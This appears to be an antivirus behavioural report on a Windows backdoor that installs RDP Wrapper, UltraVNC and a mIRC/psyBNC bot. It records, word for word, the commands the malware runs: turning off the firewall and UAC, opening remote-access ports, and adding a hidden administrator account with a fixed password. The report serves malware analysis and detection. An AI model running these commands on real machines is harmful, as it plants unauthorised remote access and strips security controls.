Technical Information
To ensure autorun and distribution
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\uvnc_service] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\uvnc_service] 'ImagePath' = '"%WINDIR%\system\vnc\winvnc.exe" -service'
- [<HKLM>\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\TermService\Parameters] 'ServiceDll' = '%ProgramFiles%\RDP Wrapper\rdpwrap.dll'
Malicious functions
To bypass firewall, removes or modifies the following registry keys
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
To complicate detection of its presence in the operating system,
blocks the following features:
- User Account Control (UAC)
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=RDP protocol=TCP dir=in localport=3389 action=allow
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=VNC protocol=TCP dir=in localport=5900 action=allow
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=Elite protocol=TCP dir=in localport=31337 action=allow
- '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Terminates or attempts to terminate
the following system processes:
- <SYSTEM32>\svchost.exe
Modifies file system
Creates the following files
- %WINDIR%\system\mirc.ini
- %WINDIR%\system\system\rdpwinst.exe
- %WINDIR%\system\system\rdpwrap.dll
- %WINDIR%\system\system\script\psybnc\psybnc.dll
- %WINDIR%\system\system\script\script3.dll
- %WINDIR%\system\system\svchost.exe
- %WINDIR%\system\system\termsrv.dll
- %WINDIR%\system\system\ucrtbase.dll
- %WINDIR%\system\system\ucrtbased.dll
- %WINDIR%\system\system\vcruntime140.dll
- %WINDIR%\system\system\vcruntime140d.dll
- %WINDIR%\system\system\winlogon.exe
- %WINDIR%\system\vnc\vnchooks.dll
- %WINDIR%\system\vnc\winvnc.exe
- %WINDIR%\system\logs\status.log
- %WINDIR%\system\system\svchost.exe.log
- %HOMEPATH%\desktop\internet explorer.lnk
- %TEMP%\7zsfx000.cmd
- %WINDIR%\system\system\script\psybnc\logs\main.log
- %WINDIR%\system\mirc996466.tm_
- %WINDIR%\system\mirc992187.tm_
- %WINDIR%\system\mirc657396.tm_
- %WINDIR%\system\mirc62893.tm_
- %WINDIR%\system\mirc826944.tm_
- %WINDIR%\system\mirc308834.tm_
- %WINDIR%\system\mirc375296.tm_
- %WINDIR%\system\mirc401811.tm_
- %ProgramFiles%\rdp wrapper\rdpwrap.ini
- %ProgramFiles%\rdp wrapper\rdpwrap.dll
- <SYSTEM32>\microsoft\protect\s-1-5-20\5d9c5a99-ffaa-4e8d-a66d-2532ea00c457
- %WINDIR%\system\system\msvcr100d.dll
- <SYSTEM32>\microsoft\protect\s-1-5-20\preferred
- %WINDIR%\system\system\msvcp140d.dll
- %WINDIR%\system\system\msvcp100d.dll
- %WINDIR%\system\psybnc.ico
- %WINDIR%\system\reg_mirc.reg
- %WINDIR%\system\system\info.bat
- %WINDIR%\system\system\rdpwrap.ini
- %WINDIR%\system\system\script\ports.txt
- %WINDIR%\system\system\script\psybnc\psybnc.bhelp.en
- %WINDIR%\system\system\script\vars.ini
- %WINDIR%\system\vnc\ultravnc.ini
- %WINDIR%\system\hid.exe
- %WINDIR%\system\mirc.exe
- %WINDIR%\system\system\api-ms-win-core-file-l1-2-0.dll
- %WINDIR%\system\system\api-ms-win-core-file-l2-1-0.dll
- %WINDIR%\system\system\api-ms-win-core-localization-l1-2-0.dll
- %WINDIR%\system\system\api-ms-win-core-processthreads-l1-1-1.dll
- %WINDIR%\system\system\api-ms-win-core-synch-l1-2-0.dll
- %WINDIR%\system\system\api-ms-win-core-timezone-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-convert-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-environment-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-filesystem-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-heap-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-locale-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-math-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-multibyte-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-runtime-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-stdio-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-string-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-time-l1-1-0.dll
- %WINDIR%\system\system\api-ms-win-crt-utility-l1-1-0.dll
- %WINDIR%\system\system\init.exe
- %WINDIR%\system\system\msvcp140.dll
- %PROGRAMDATA%\microsoft\crypto\rsa\machinekeys\f686aace6942fb7f7ceb231212eef4a4_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
Deletes the following files
- %TEMP%\7zsfx000.cmd
Moves the following files
- from %WINDIR%\system\mirc996466.tm_ to %WINDIR%\system\mirc.ini
- from %WINDIR%\system\mirc992187.tm_ to %WINDIR%\system\system\script\vars.ini
- from %WINDIR%\system\mirc62893.tm_ to %WINDIR%\system\mirc.ini
- from %WINDIR%\system\mirc826944.tm_ to %WINDIR%\system\servers.ini
- from %WINDIR%\system\mirc308834.tm_ to %WINDIR%\system\servers.ini
- from %WINDIR%\system\mirc375296.tm_ to %WINDIR%\system\servers.ini
- from %WINDIR%\system\mirc401811.tm_ to %WINDIR%\system\mirc.ini
Deletes itself.
Network activity
TCP
HTTP GET requests
- http://ip##fo.io/95.211.190.199
UDP
- DNS ASK ra#.####ubusercontent.com
- DNS ASK ir###.iownyour.biz
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK ip##fo.io
Miscellaneous
Searches for the following windows
- ClassName: 'RegEdit_RegEdit' WindowName: ''
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
- ClassName: 'ConsoleWindowClass' WindowName: ''
Creates and executes the following
- '%WINDIR%\system\system\init.exe'
- '%WINDIR%\system\mirc.exe'
- '%WINDIR%\system\system\rdpwinst.exe' -i -o
- '%WINDIR%\system\system\svchost.exe'
- '%WINDIR%\system\system\rdpwinst.exe' -w
- '%WINDIR%\system\vnc\winvnc.exe' -install
- '%WINDIR%\system\vnc\winvnc.exe' -service
- '%WINDIR%\system\vnc\winvnc.exe' -service_run
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZSfx000.cmd" "' (with hidden window)
- '%WINDIR%\syswow64\net.exe' start "uvnc_service"' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /c START /B regedit /s %windir%\system\Reg_mIRC.reg & START /B %windir%\system\mirc.exe & START /MIN reg ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG...
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZSfx000.cmd" "
- '%WINDIR%\syswow64\cmd.exe' /K %WINDIR%\system\system\info.bat
- '%WINDIR%\syswow64\net1.exe' user ASP.NET W33dz123!@#$ /ADD
- '%WINDIR%\syswow64\net1.exe' localgroup Administrators ASP.NET /ADD
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 2 "%WINDIR%\system\mirc.exe"
- '%WINDIR%\syswow64\net1.exe' localgroup "Remote Desktop Users" ASP.NET /ADD
- '%WINDIR%\syswow64\net1.exe' user ASP.NET W33dz123!@#$
- '%WINDIR%\syswow64\net.exe' localgroup "Remote Desktop Users" ASP.NET /ADD
- '%WINDIR%\syswow64\net.exe' localgroup Administrators ASP.NET /ADD
- '%WINDIR%\syswow64\net.exe' user ASP.NET W33dz123!@#$
- '%WINDIR%\syswow64\net.exe' user ASP.NET W33dz123!@#$ /ADD
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\netsh.exe' advfirewall set allprofiles state off
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\regedit.exe' /s %WINDIR%\system\Reg_mIRC.reg
- '%WINDIR%\syswow64\net.exe' start "uvnc_service"
- '%WINDIR%\syswow64\net1.exe' start "uvnc_service"